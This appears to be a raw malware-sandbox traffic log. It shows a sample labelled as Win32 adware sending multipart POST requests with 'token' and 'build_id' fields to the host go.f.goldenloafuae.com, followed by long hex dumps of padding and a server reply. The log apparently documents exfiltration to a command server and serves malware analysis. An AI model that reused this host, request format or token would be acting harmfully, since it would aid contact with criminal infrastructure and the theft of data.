                                                                                    2025-03-07 19:45:58 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 75 33 65 63 6a 65 6b 36 66 63 6a 35 38 79 63 62 73 6a 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 39 65 36 38 32 62 61 63 62 61 32 33 33 30 32 61 39 36 39 31 65 66 61 62 66 37 32 36 33 33 0d 0a 2d 2d 2d 2d 2d 2d 75 33 65 63 6a 65 6b 36 66 63 6a 35 38 79 63 62 73 6a 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 31 30 61 35 34 61 31 32 38 64 35 37 31 66 33 64 64 37 62 36 33 39 30 65 61 66 63 32 62 66 38 0d 0a 2d 2d 2d 2d 2d 2d 75 33 65 63 6a 65 6b 36 66 63 6a 35 38 79 63 62 73 6a 35 38 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------u3ecjek6fcj58ycbsj58Content-Disposition: form-data; name="token"879e682bacba23302a9691efabf72633------u3ecjek6fcj58ycbsj58Content-Disposition: form-data; name="build_id"610a54a128d571f3dd7b6390eafc2bf8------u3ecjek6fcj58ycbsj58Cont
                                                                                    2025-03-07 19:45:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:58 UTC6186OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:46:00 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Fri, 07 Mar 2025 19:45:59 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    20192.168.2.44975695.217.27.2524437696C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-07 19:45:59 UTC298OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----ymymyuai5x4w47gv3eus
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                    Host: go.f.goldenloafuae.com
                                                                                    Content-Length: 393697
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2025-03-07 19:45:59 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 79 6d 79 6d 79 75 61 69 35 78 34 77 34 37 67 76 33 65 75 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 39 65 36 38 32 62 61 63 62 61 32 33 33 30 32 61 39 36 39 31 65 66 61 62 66 37 32 36 33 33 0d 0a 2d 2d 2d 2d 2d 2d 79 6d 79 6d 79 75 61 69 35 78 34 77 34 37 67 76 33 65 75 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 31 30 61 35 34 61 31 32 38 64 35 37 31 66 33 64 64 37 62 36 33 39 30 65 61 66 63 32 62 66 38 0d 0a 2d 2d 2d 2d 2d 2d 79 6d 79 6d 79 75 61 69 35 78 34 77 34 37 67 76 33 65 75 73 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------ymymyuai5x4w47gv3eusContent-Disposition: form-data; name="token"879e682bacba23302a9691efabf72633------ymymyuai5x4w47gv3eusContent-Disposition: form-data; name="build_id"610a54a128d571f3dd7b6390eafc2bf8------ymymyuai5x4w47gv3eusCont
                                                                                    2025-03-07 19:45:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
